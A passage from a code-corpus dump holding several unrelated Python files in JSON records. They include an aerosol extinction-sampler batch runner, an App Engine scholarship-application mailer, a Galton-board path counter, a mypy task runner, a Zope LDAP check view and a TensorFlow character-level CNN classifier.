stat_name\n stat = get_stat_in_paths(paths, 'env_infos', stat_name)\n statistics.update(create_stats_ordered_dict(\n '%s%s' % (prefix, stat_name),\n stat,\n always_show_all_stats=True,\n ))\n statistics.update(create_stats_ordered_dict(\n 'Final %s%s' % (prefix, stat_name),\n [s[-1] for s in stat],\n always_show_all_stats=True,\n ))\n return statistics\n\n def _set_env_state(self, state):\n ''' According to multiworld, there is a base class. 
\n But this is roughly already the base class along the inheritance chain.\n I put the implementation here.\n '''\n joint_state, mocap_state = state\n self.sim.set_state(joint_state)\n # mocap_pos, mocap_quat = mocap_state\n # self.data.set_mocap_pos('body0', mocap_pos) # It seems it has no mocap in use\n # self.data.set_mocap_quat('body0', mocap_quat)\n self.sim.forward()\n\n# End Adding interface for multiworld environment collection\n","sub_path":"multiworld/envs/goal_env_ext/reacher/reacher_env.py","file_name":"reacher_env.py","file_ext":"py","file_size_in_byte":9549,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313219944","text":"#!/usr/bin/env python3\n\n\"\"\"\n Wrapper for ext_sampler.py\n Gets extinction veritcal profiles and aerosol intensive properties\n Uses trj_sampled files as inputs\n\n adapted from run_lidar_sampler.py\n Patricia Castellanos, Oct, 2019\n\n\"\"\"\n\nimport os\nimport errno\nimport subprocess\nimport argparse\nimport time\nfrom datetime import datetime, timedelta\nfrom dateutil.parser import parse as isoparser\nfrom MAPL import Config\nfrom netCDF4 import Dataset\nimport numpy as np\n\n\n#------------------------------------ M A I N ------------------------------------\ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\ndef StartNew(processes,cmds,nextdate,lendate):\n \"\"\" Start a new subprocess if there is work to do \"\"\"\n\n if nextdate < lendate:\n proc = subprocess.Popen(cmds[nextdate], shell=True)\n print(cmds[nextdate])\n nextdate += 1\n processes.append(proc)\n\n return processes,nextdate\n\ndef CheckRunning(processes,cmds,nextdate,lendate,args):\n \"\"\" Check any running processes and start new ones if there are spare slots.\"\"\"\n\n for p in range(len(processes))[::-1]: # Check the processes in reverse order\n if processes[p].poll() is not None: # 
If the process hasn't finished will return None\n del processes[p] # Remove from list - this is why we needed reverse order\n\n while (len(processes) < args.nproc) and (nextdate < lendate): # More to do and some spare slots\n processes, nextdate = StartNew(processes,cmds,nextdate,lendate)\n\n return processes,nextdate\n\nif __name__ == \"__main__\":\n\n # Defaults\n DT_hours = 1\n nproc = 12\n rcFile = 'Aod_EOS.rc'\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"iso_t1\",\n help=\"starting iso time\")\n parser.add_argument(\"iso_t2\",\n help=\"ending iso time\")\n\n parser.add_argument(\"input\",\n help=\"filename template\")\n\n parser.add_argument(\"output\",\n help=\"filename template\") \n\n parser.add_argument(\"channel\",\n help=\"channel\") \n\n parser.add_argument(\"-D\",\"--DT_hours\", default=DT_hours, type=int,\n help=\"Timestep in hours for each file (default=%i)\"%DT_hours)\n\n parser.add_argument(\"--rc\", default=rcFile,\n help=\"rc File (default=%s)\"%rcFile) \n\n parser.add_argument(\"-v\", \"--verbose\",action=\"store_true\",\n help=\"Verbose mode (default=False).\")\n\n parser.add_argument(\"-r\", \"--dryrun\",action=\"store_true\",\n help=\"do a dry run (default=False).\") \n\n parser.add_argument(\"--coarse\",action=\"store_true\",\n help=\"do coarse mode only (default=False).\")\n\n parser.add_argument(\"--fine\",action=\"store_true\",\n help=\"do fine mode only (default=False).\")\n parser.add_argument(\"--spc\",action=\"store_true\",\n help=\"do indivudual species (default=False).\")\n\n parser.add_argument(\"-n\", \"--nproc\",default=nproc,type=int,\n help=\"Number of processors (default=%i).\"%nproc) \n\n args = parser.parse_args()\n\n ch = args.channel \n enddate = isoparser(args.iso_t2)\n pdf = timedelta(hours=DT_hours)\n\n Date = isoparser(args.iso_t1)\n inFilelist = []\n outFilelist = []\n while Date < enddate:\n YY = Date.strftime('%Y')\n MM = Date.strftime('%m')\n DD = Date.strftime('%d')\n strdate = 
Date.strftime('%Y%m%d_%H%Mz') \n inFile = args.input.format(YY,MM,DD,strdate)\n outFile = args.output.format(YY,MM,DD,strdate,ch)\n outpath = os.path.dirname(outFile)\n mkdir_p(outpath)\n\n inFilelist.append(inFile)\n outFilelist.append(outFile)\n\n Date += timedelta(hours=args.DT_hours)\n\n # run extinction sampler on model fields\n # split across multiple processors by date\n processes = []\n cmds = []\n for inFile,outFile in zip(inFilelist,outFilelist):\n # all species\n Options = \" --vnames=SS001,SS002,SS003,SS004,SS005,BCPHOBIC,BCPHILIC,OCPHOBIC,OCPHILIC,SO4,DU001,DU002,DU003,DU004,DU005\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\" \n\n if args.verbose:\n Options += \" --verbose\" \n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n if args.spc:\n SPC = {'SU':'SO4',\n 'OC':'OCPHILIC,OCPHOBIC',\n 'BC':'BCPHILIC,BCPHOBIC',\n 'SS':'SS001,SS002,SS003,SS004,SS005',\n 'DU':'DU001,DU002,DU003,DU004,DU005'}\n for spc in SPC:\n for inFile,outFile in zip(inFilelist,outFilelist):\n # all species indivudually \n Options = \" --vnames=\" + SPC[spc] + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".\"+spc+\".nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" \n #\" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n # coarse mode only\n if args.coarse:\n for inFile,outFile in zip(inFilelist,outFilelist):\n Options = \" --vnames=SS001,SS002,SS003,SS004,SS005,DU001,DU002,DU003,DU004,DU005\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".coarse.nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} 
'.format(Options)\n cmds.append(cmd)\n\n # fine mode only\n if args.fine:\n for inFile,outFile in zip(inFilelist,outFilelist):\n Options = \" --vnames=BCPHOBIC,BCPHILIC,OCPHOBIC,OCPHILIC,SO4\" + \\\n \" --input=\" + inFile + \\\n \" --output=\" + outFile[:-4] + \".fine.nc4\" + \\\n \" --channel=\" + ch + \\\n \" --rc=\" + args.rc + \\\n \" --format=NETCDF4_CLASSIC\" + \\\n \" --intensive\"\n\n if args.verbose:\n Options += \" --verbose\"\n\n cmd = 'ext_sampler.py {} '.format(Options)\n cmds.append(cmd)\n\n lendate = len(cmds)\n # Manage processes\n # This will start the max processes running \n if not args.dryrun:\n processes, nextdate = CheckRunning(processes,cmds,0,lendate,args)\n while len(processes)>0: # Some things still going on\n time.sleep(10) # Wait\n # add more processes as other ones finish\n processes, nextdate = CheckRunning(processes,cmds,nextdate,lendate,args)\n else:\n for cmd in cmds:\n print(cmd)\n\n","sub_path":"src/Components/rtms/leo_vlidort/run_ext_sampler.py","file_name":"run_ext_sampler.py","file_ext":"py","file_size_in_byte":7728,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331232159","text":"from google.appengine.ext.db import BadValueError\nfrom scholarships.models import ScholarshipApplication, Scholarship\nfrom google.appengine.api import mail\nimport traceback\nimport logging\n\nfrom datetime import datetime, timedelta\n\nclass ScholarshipManager(object):\n def __init__(self, result=None):\n self.result = result\n\n def get(self, name):\n scholarship = Scholarship.query()\\\n .filter(Scholarship.name == name)\\\n .get()\n\n if scholarship is None:\n now = datetime.now()\n s_date = now - timedelta(days=5)\n e_date = now + timedelta(days=5)\n\n scholarship = Scholarship(name=name, start_date=s_date, end_date=e_date)\n scholarship.put()\n\n if scholarship is None:\n code = 'There are no scholarships available at this time.'\n self.result.add_error(code)\n return None\n\n if 
self.result:\n info = 'This scholarship application will be open from {0} to {1}'\n self.result.add_info(info.format(scholarship.start_date.strftime(\"%m/%d/%y\"), scholarship.end_date.strftime(\"%m/%d/%y\")))\n\n valid = scholarship.validate(self.result)\n return scholarship if valid else None\n\n\n def add(self, scholarship, data):\n application = ScholarshipApplication(parent=scholarship.key)\n\n del data['csrfmiddlewaretoken']\n\n #application.save(**data)\n try:\n application.populate(**data)\n application.put()\n except BadValueError as bve:\n field_name = bve.message.split(': ')[1]\n msg = 'The value for the field \"{0}\" is required.'.format(field_name)\n self.result.add_error(msg)\n return application\n except TypeError as te:\n self.result.add_error(te.message)\n return application\n\n self.send_email(application)\n\n return application\n\n def resend(self, scholarship, email):\n app = ScholarshipApplication\\\n .query(ancestor=scholarship.key)\\\n .filter(ScholarshipApplication.email == email)\\\n .get()\n\n if app is None:\n pass\n\n self.send_email(app)\n return app\n\n\n def get_current_applications(self):\n applications = ScholarshipApplication.query().fetch(100)\n return applications\n\n\n def get_default(self):\n return ScholarshipApplication()\n\n\n def send_email(self, application):\n email_manager = EmailManager()\n\n try:\n email_manager.send_confirmation(application.name, application.email)\n # email_manager.send_full_notification('pedro.diaz.vargas@gmail.com', application)\n email_manager.send_full_notification('Alejandro_Carrascal@oxy.com', application)\n except:\n email_manager.send_confirmation('Pedro', 'pedro.diaz.vargas@gmail.com')\n stacktrace = traceback.format_exc()\n logging.error('%s', stacktrace)\n\n\nclass EmailManager(object):\n fields = 
('essay','name','phone','email','address','currentMajor','previousMajor','citizenship','colsaMember','testName','testPercent','overallGpa','currentGpa','standing','tuitionWaiver','employeer','workHours','carCost','dependents','employedOnCampus','additionalAid','colsaContributions','colsaHours','colsaStartDate','honors','publications','studentId','expectedGraduationDate',)\n\n def send_confirmation(self, name, email):\n\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"Your scholarship application has been received\")\n\n message.to = email\n message.body = \"\"\"\n Dear {0}:\n\n Your scholarship application has been successfully received.\n We will announce the winners of this year's scholarships during the colombian night.\n\n If you have any questions please contact Yoana Walschap: ywalschap@ou.edu\n \"\"\".format(name)\n\n message.send()\n\n\n def send_notification(self, admin, applicant_name, applicant_email):\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"New Scholarship Application\")\n\n message.to = admin\n message.body = \"\"\"\n We have received a new scholarship application for {0}: {1}\n \"\"\".format(applicant_name, applicant_email)\n\n message.send()\n\n\n def send_full_notification(self, admin, application):\n message = mail.EmailMessage(sender=\"colouaa@gmail.com\",\n subject=\"New Scholarship Application\")\n\n message.to = admin\n message.html = self.get_body(application)\n\n message.send()\n\n\n def get_body(self, application):\n fields = application.to_dict()\n\n prefix = ['', '']\n postfix = ['', '
']\n\n pattern = '{0}{1}'\n body = [pattern.format(field, self.getField(fields, field)) for field in fields]\n\n return ''.join(prefix + body + postfix)\n\n def getField(self, set, key):\n if key in set:\n return set[key].encode('utf8')\n\n return ''\n\n","sub_path":"scholarships/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":5233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"297220765","text":"\"\"\"\nA ball is dropped into a special Galton board where at each level in the board the ball can only move right or down.\nGiven that the Galton board has M rows and N columns, return the total number of unique ways the ball can arrive at\nthe bottom right cell of the Galton board.\n\nEx: Given the following values of M and N…\n\nM = 2, N = 2, return 2.\nThe possible paths are DOWN -> RIGHT and RIGHT -> DOWN\nEx: Given the following values of M and N…\n\nM = 4, N = 3, return 10.\n\"\"\"\n\n\ndef number_of_unique_ways(M: int, N: int):\n if not M and not N:\n return 0\n if M == 1 and N == 1:\n return 1\n stack = [(0, 0)]\n ways = 0\n\n while stack:\n x, y = stack.pop()\n if x == N - 1 and y == -(M - 1):\n ways += 1\n else:\n directions = [(x+1, y), (x, y-1)]\n for new_x, new_y in directions:\n if 0 <= x <= N - 1 and -(M - 1) <= y <= 0:\n stack.append((new_x, new_y))\n return ways\n\n\ndef unique_ways_faster(M: int, N: int) -> int:\n if not M and not N:\n return 0\n if M == 1 and N == 1:\n return 1\n\n ways = [[0 for _ in range(N)] for _ in range(M)]\n\n for i in range(M):\n for j in range(N):\n ways[i][0] = 1\n ways[0][j] = 1\n for i in range(1, M):\n for j in range(1, N):\n ways[i][j] = ways[i-1][j] + ways[i][j-1]\n return ways[-1][-1]\n\n\nprint(number_of_unique_ways(2, 2))\nprint(number_of_unique_ways(4, 3))\nprint(unique_ways_faster(4, 
3))","sub_path":"google/galton_board.py","file_name":"galton_board.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"18337128","text":"from CommandData import CommandData\nfrom History import History\nfrom Globals import numStackSlots, numSlots\n\n# TODO: If help flag is set, call the corresponding command help function\n\ndef isValidSlotIndex(slot: int) -> bool:\n return slot >= 0 and slot < numSlots\n\ndef isValidStackSlotIndex(slot: int) -> bool:\n return slot >= 0 and slot < numStackSlots\n\ndef printTop(data):\n print(data.stackSlots[0])\n\ndef clear(commandInfo: CommandData):\n with History() as data:\n if commandInfo.allFlag:\n data.clearDefaultSlot()\n data.stackSlots.clear()\n data.slots.clear()\n print(\"Cleared slots, default space, and stack\")\n else:\n if (commandInfo.slotsFlag):\n if commandInfo.slot is None:\n data.slots.clear()\n print(\"Cleared all slots\")\n elif isValidSlotIndex(commandInfo.slot):\n data.clearSlot(commandInfo.slot)\n print(\"Cleared slot\", commandInfo.slot)\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n elif commandInfo.stackFlag:\n data.stackSlots.clear()\n print(\"Cleared stack\")\n else:\n data.clearDefaultSlot()\n print(\"Cleared default space\")\n\ndef pop(commandInfo: CommandData):\n with History() as data:\n mostRecentStackSlot = data.popStackSlot()\n print(mostRecentStackSlot)\n\ndef push(commandInfo: CommandData):\n with History() as data:\n if commandInfo.branchFlag:\n data.pushStackSlot(commandInfo.branch)\n print(\"Branch\", commandInfo.branch, \"saved to top of stack\")\n else:\n data.pushStackSlot(commandInfo.directory)\n print(\"Directory\", commandInfo.directory, \"saved to top of stack\")\n\ndef save(commandInfo: CommandData):\n with History() as data:\n if commandInfo.slot is None:\n if commandInfo.branchFlag:\n data.defaultSlot = commandInfo.branch\n print(\"Branch\", commandInfo.branch, \"saved 
to the default space\")\n else:\n data.defaultSlot = commandInfo.directory\n print(\"Directory\", commandInfo.directory, \"saved to the default space\")\n elif isValidSlotIndex(commandInfo.slot):\n if commandInfo.branchFlag:\n data.slots[commandInfo.slot] = commandInfo.branch\n print(\"Branch\", commandInfo.branch, \"saved to save slot\", commandInfo.slot)\n else:\n data.slots[commandInfo.slot] = commandInfo.directory\n print(\"Directory\", commandInfo.directory, \"saved to save slot\", commandInfo.slot)\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n\ndef show(commandInfo: CommandData):\n with History() as data:\n if commandInfo.allFlag:\n print(\"---Default Slot---\")\n print(data.defaultSlotString())\n print(\"\\n\\n---Slots---\")\n print(data.allSlotsAsString())\n print(\"\\n\\n---Stack---\")\n print(data.allStackSlotsAsString())\n else:\n if commandInfo.stackFlag:\n if commandInfo.topFlag:\n printTop(data)\n elif not commandInfo.slot is None and isValidStackSlotIndex(commandInfo.slot):\n print(data.stackSlots[commandInfo.slot])\n else:\n print(data.allStackSlotsAsString())\n elif commandInfo.slotsFlag:\n if commandInfo.slot is None:\n print(data.allSlotsAsString())\n else:\n if isValidSlotIndex(commandInfo.slot):\n print(data.slots[commandInfo.slot])\n else:\n print(\"Slot must be between 0 and\", numSlots - 1)\n else:\n print(data.defaultSlot)\n\ndef top(commandInfo: CommandData):\n with History() as data:\n printTop(data)","sub_path":"ArgFunctions.py","file_name":"ArgFunctions.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"349958315","text":"# coding=utf-8\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport hashlib\n\nimport os\nimport shlex\n\nfrom subprocess import Popen, PIPE\n\nfrom typing import Optional, Tuple\n\nfrom mypytools.config import 
config\n\n\nSTRICT_OPTIONAL_DIRS = [os.path.join(config['root_dir'], d['path']) for d in config['src_dirs'] if d.get('strict_optional')]\n\n\nclass MypyTask(object):\n def __init__(self, filename):\n # type: (str) -> None\n self.filename = filename\n self._proc = None # type: Optional[Popen]\n\n def _should_use_strict_optional(self, path):\n # type: (str) -> bool\n for strict_path in STRICT_OPTIONAL_DIRS:\n if path.startswith(strict_path):\n return True\n return False\n\n def _get_file_hash(self):\n # type: () -> str\n with open(self.filename, 'rb') as f:\n return hashlib.md5(f.read()).hexdigest()\n\n def execute(self):\n # type: () -> Tuple[str, str]\n mypy_path = os.pathsep.join(os.path.join(config['root_dir'], path) for path in config.get('mypy_path', []))\n flags = ' '.join(config.get('global_flags', []))\n strict_optional = '--strict-optional' if self._should_use_strict_optional(self.filename) else ''\n cmd = shlex.split(\"/usr/local/bin/mypy {} {} {}\".format(flags, strict_optional, self.filename))\n try:\n before_file_hash = self._get_file_hash()\n after_file_hash = ''\n out = ''\n exit_code = 0\n while before_file_hash != after_file_hash:\n before_file_hash = after_file_hash\n self._proc = Popen(cmd, stdout=PIPE, stderr=PIPE, env={'MYPY_PATH': mypy_path})\n out, err = self._proc.communicate()\n exit_code = self._proc.wait()\n # This still has an ABA problem, but ¯\\_(ツ)_/¯\n after_file_hash = self._get_file_hash()\n return ('', before_file_hash) if exit_code == 0 else (out, before_file_hash)\n except Exception as e:\n print(e)\n return '', ''\n finally:\n self._proc = None\n\n def interrupt(self):\n # type: () -> None\n if self._proc is None:\n return\n try:\n # There's a race between interrupting the stored process and\n # the process exiting. 
If the process exits first then killing\n # it will throw an OSError, so just swallow that and keep going.\n self._proc.kill()\n except OSError:\n pass\n\n def __eq__(self, other):\n # type: (object) -> bool\n if not isinstance(other, MypyTask):\n raise NotImplemented\n return self.filename == other.filename\n\n def __hash__(self):\n # type: () -> int\n return self.filename.__hash__()\n\n","sub_path":"mypytools/server/mypy_task.py","file_name":"mypy_task.py","file_ext":"py","file_size_in_byte":2871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"194735801","text":"##############################################################################\n#\n# Copyright (c) 2004 Zope Corporation and Contributors.\n# All Rights Reserved.\n#\n# This software is subject to the provisions of the Zope Public License,\n# Version 2.1 (ZPL). A copy of the ZPL should accompany this distribution.\n# THIS SOFTWARE IS PROVIDED \"AS IS\" AND ANY AND ALL EXPRESS OR IMPLIED\n# WARRANTIES ARE DISCLAIMED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED\n# WARRANTIES OF TITLE, MERCHANTABILITY, AGAINST INFRINGEMENT, AND FITNESS\n# FOR A PARTICULAR PURPOSE.\n#\n##############################################################################\n\"\"\"View Class for the Container's Contents view.\n\n$Id$\n\"\"\"\n\nfrom zope.exceptions import NotFoundError\n\nfrom zope.app import zapi\nfrom zope.app.size.interfaces import ISized\nfrom zope.app.pagetemplate.viewpagetemplatefile import ViewPageTemplateFile\nfrom zope.app.publisher.browser import BrowserView\nfrom zope.app.i18n import ZopeMessageIDFactory as _\n\nfrom ldapauth.interfaces import ILDAPBasedPrincipalSource\nfrom ldapauth.interfaces import ICheckLDAPAdapter\n\n\n\nclass CheckLDAPView(BrowserView):\n\n __used_for__ = ILDAPBasedPrincipalSource\n\n\n def __init__(self, context, request):\n self.context = context\n self.request = request\n self.__parent__ = context\n self.report = []\n\n def 
getHostInfo(self):\n \"\"\"Returns a dict with host information.\"\"\"\n infoDict = {}\n infoDict['host'] = self.context.host\n infoDict['port'] = self.context.port\n infoDict['basedn'] = self.context.basedn\n infoDict['login_attribute'] = self.context.login_attribute\n infoDict['manager_dn'] = self.context.manager_dn\n return infoDict\n\n\n def checkConnection(self):\n \"\"\"Check connetction to the given LDAP server.\"\"\"\n runtest = self.request.get('runtest', None)\n if runtest == \"Run\":\n un = self.request.get('username')\n pw = self.request.get('password')\n \n # get the ldapauth source\n testadapter = ICheckLDAPAdapter(self.context)\n\n # test the connection to the LDAP server\n self._addInfo(\"Test python connection and LDAP server binding\")\n self.report = self.report + testadapter.testConnection()\n self._addInfo(\" \")\n\n # test quering the LDAP server\n self._addInfo(\"Test get principals\")\n self.report = self.report + testadapter.testGetPrincipals(un)\n self._addInfo(\" \")\n\n # test query the given username\n\n # test authenticate the given username\n\n self._addInfo(\"... 
more test\")\n \n return self.report\n else:\n return \"\"\n\n def _addInfo(self, res):\n \"\"\"Add traceback info to the report list\"\"\"\n self.report.append(res)\n\n check = ViewPageTemplateFile('check.pt')\n","sub_path":"ldapauth/trunk/browser/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":2943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"413640581","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nCopyright 2018 NAVER Corp.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of this software and\nassociated documentation files (the \"Software\"), to deal in the Software without restriction, including\nwithout limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is furnished to do so, subject to\nthe following conditions:\n\nThe above copyright notice and this permission notice shall be included in all copies or substantial\nportions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,\nINCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A\nPARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT\nHOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF\nCONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE\nOR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n\"\"\"\n\n\nimport argparse\nimport math\nimport os\n\nimport numpy as np\nimport tensorflow as tf\n\nimport nsml\nfrom nsml import DATASET_PATH, HAS_DATASET, IS_ON_NSML\nfrom dataset import KinQueryDataset, preprocess\n\n\nhe_normal = tf.contrib.layers.variance_scaling_initializer(factor=1., mode='FAN_AVG', uniform=True)\nregularizer = tf.contrib.layers.l2_regularizer(1e-4)\n\n\n# DONOTCHANGE: They are reserved for nsml\n# This is for nsml leaderboard\ndef bind_model(sess, config):\n # 학습한 모델을 저장하는 함수입니다.\n def save(dir_name, *args):\n # directory\n os.makedirs(dir_name, exist_ok=True)\n saver = tf.train.Saver()\n saver.save(sess, os.path.join(dir_name, 'model'))\n\n # 저장한 모델을 불러올 수 있는 함수입니다.\n def load(dir_name, *args):\n saver = tf.train.Saver()\n # find checkpoint\n ckpt = tf.train.get_checkpoint_state(dir_name)\n if ckpt and ckpt.model_checkpoint_path:\n checkpoint = os.path.basename(ckpt.model_checkpoint_path)\n saver.restore(sess, os.path.join(dir_name, checkpoint))\n else:\n raise NotImplemented('No checkpoint!')\n print('Model loaded')\n\n def infer(raw_data, **kwargs):\n \"\"\"\n :param raw_data: raw input (여기서는 문자열)을 입력받습니다\n :param kwargs:\n :return:\n \"\"\"\n # dataset.py에서 작성한 preprocess 함수를 호출하여, 문자열을 벡터로 변환합니다\n preprocessed_data = preprocess(raw_data, config.strmaxlen)\n # 저장한 모델에 입력값을 넣고 prediction 결과를 리턴받습니다\n pred = sess.run(prob, feed_dict={x: preprocessed_data, is_train: False})\n clipped = np.array(pred > config.threshold, dtype=np.int)\n # DONOTCHANGE: They are reserved for nsml\n # 리턴 결과는 [(확률, 0 or 1)] 의 형태로 보내야만 리더보드에 올릴 수 있습니다. 
리더보드 결과에 확률의 값은 영향을 미치지 않습니다\n return list(zip(pred.flatten(), clipped.flatten()))\n\n # DONOTCHANGE: They are reserved for nsml\n # nsml에서 지정한 함수에 접근할 수 있도록 하는 함수입니다.\n nsml.bind(save=save, load=load, infer=infer)\n\n\ndef _batch_loader(iterable, n=1):\n length = len(iterable)\n for n_idx in range(0, length, n):\n yield iterable[n_idx:min(n_idx + n, length)]\n\n\ndef Convolutional_Block(inputs, shortcut, num_filters, name, is_training):\n with tf.variable_scope(\"conv_block_\" + str(num_filters) + \"_\" + name):\n for i in range(2):\n with tf.variable_scope(\"conv1d_%s\" % str(i)):\n filter_shape = [3, inputs.get_shape()[2], num_filters]\n W = tf.get_variable(name='W', shape=filter_shape,\n initializer=he_normal,\n regularizer=regularizer)\n inputs = tf.nn.conv1d(inputs, W, stride=1, padding=\"SAME\")\n inputs = tf.layers.batch_normalization(inputs=inputs, momentum=0.9, epsilon=1e-5,\n center=True, scale=True, training=is_training)\n inputs = tf.nn.relu(inputs)\n\n if shortcut is not None:\n return inputs + shortcut\n\n return inputs\n\n\ndef downsampling(inputs, downsampling_type, name, optional_shortcut=False, shortcut=None):\n if downsampling_type == 'k-maxpool':\n k = math.ceil(int(inputs.get_shape()[1]) / 2)\n pool = tf.nn.top_k(tf.transpose(inputs, [0, 2, 1]), k=k, name=name, sorted=False)[0]\n pool = tf.transpose(pool, [0, 2, 1])\n elif downsampling_type == 'linear':\n pool = tf.layers.conv1d(inputs=inputs, filters=inputs.get_shape()[2], kernel_size=3,\n strides=2, padding='same', use_bias=False)\n else: # best\n pool = tf.layers.max_pooling1d(inputs=inputs, pool_size=3, strides=2, padding='same', name=name)\n\n if optional_shortcut:\n shortcut = tf.layers.conv1d(inputs=shortcut, filters=shortcut.get_shape()[2], kernel_size=1,\n strides=2, padding='same', use_bias=False)\n pool += shortcut\n\n pool = fixed_padding(inputs=pool)\n return tf.layers.conv1d(inputs=pool, filters=pool.get_shape()[2] * 2, kernel_size=1,\n strides=1, padding='valid', 
use_bias=False)\n\n\ndef fixed_padding(inputs, kernel_size=3):\n pad_total = kernel_size - 1\n pad_beg = pad_total // 2\n pad_end = pad_total - pad_beg\n padded_inputs = tf.pad(inputs, [[0, 0], [pad_beg, pad_end], [0, 0]])\n return padded_inputs\n\n\nclass TextCNN(object):\n def __init__(self, num_classes=1, sequence_max_length=1012, vocab_size=251, embedding_size=16,\n depth=29, downsampling_type='maxpool', optional_shortcut=True, lr=1e-3, fc_units=2048):\n\n self.input_x = tf.placeholder(tf.int32, [None, sequence_max_length], name=\"input_x\")\n self.input_y = tf.placeholder(tf.float32, [None, num_classes], name=\"input_y\")\n self.is_training = tf.placeholder(tf.bool, name='is_training')\n\n if depth == 9:\n num_layers = [2, 2, 2, 2]\n elif depth == 17:\n num_layers = [4, 4, 4, 4]\n elif depth == 29: # best\n num_layers = [10, 10, 4, 4]\n elif depth == 49: # not good\n num_layers = [16, 16, 10, 6]\n else:\n raise NotImplementedError\n\n with tf.name_scope(\"embedding\"):\n # self.W = tf.Variable(tf.random_uniform([vocab_size, embedding_size], -1., 1.), name=\"W\")\n self.W = tf.get_variable('lookup-W', shape=[vocab_size, embedding_size],\n initializer=he_normal)\n self.embedded_chars = tf.nn.embedding_lookup(self.W, self.input_x)\n\n self.layers = []\n\n with tf.variable_scope('temp-conv'):\n filter_shape = [3, embedding_size, 64]\n W = tf.get_variable(name='W_1', shape=filter_shape,\n initializer=he_normal,\n regularizer=regularizer)\n inputs = tf.nn.conv1d(self.embedded_chars, W, stride=1, padding=\"SAME\")\n\n self.layers.append(inputs)\n\n for i in range(num_layers[0]):\n if i < num_layers[0] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=64,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool1 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool1',\n 
optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool1)\n\n for i in range(num_layers[1]):\n if i < num_layers[1] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=128,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool2 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool2',\n optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool2)\n\n for i in range(num_layers[2]):\n if i < num_layers[2] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=256,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n pool3 = downsampling(self.layers[-1], downsampling_type=downsampling_type, name='pool3',\n optional_shortcut=optional_shortcut, shortcut=self.layers[-2])\n self.layers.append(pool3)\n\n for i in range(num_layers[3]):\n if i < num_layers[3] - 1 and optional_shortcut:\n shortcut = self.layers[-1]\n else:\n shortcut = None\n conv_block = Convolutional_Block(inputs=self.layers[-1], shortcut=shortcut, num_filters=512,\n is_training=self.is_training, name=str(i + 1))\n self.layers.append(conv_block)\n\n # Extract 8 most features as mentioned in paper\n self.k_pooled = tf.nn.top_k(tf.transpose(self.layers[-1], [0, 2, 1]), k=8, name='k_pool', sorted=False)[0]\n\n self.flatten = tf.layers.flatten(self.k_pooled) # tf.reshape(self.k_pooled, (-1, 512 * 8))\n\n # Final (un-normalized) scores and predictions\n with tf.variable_scope('fc1'):\n w = 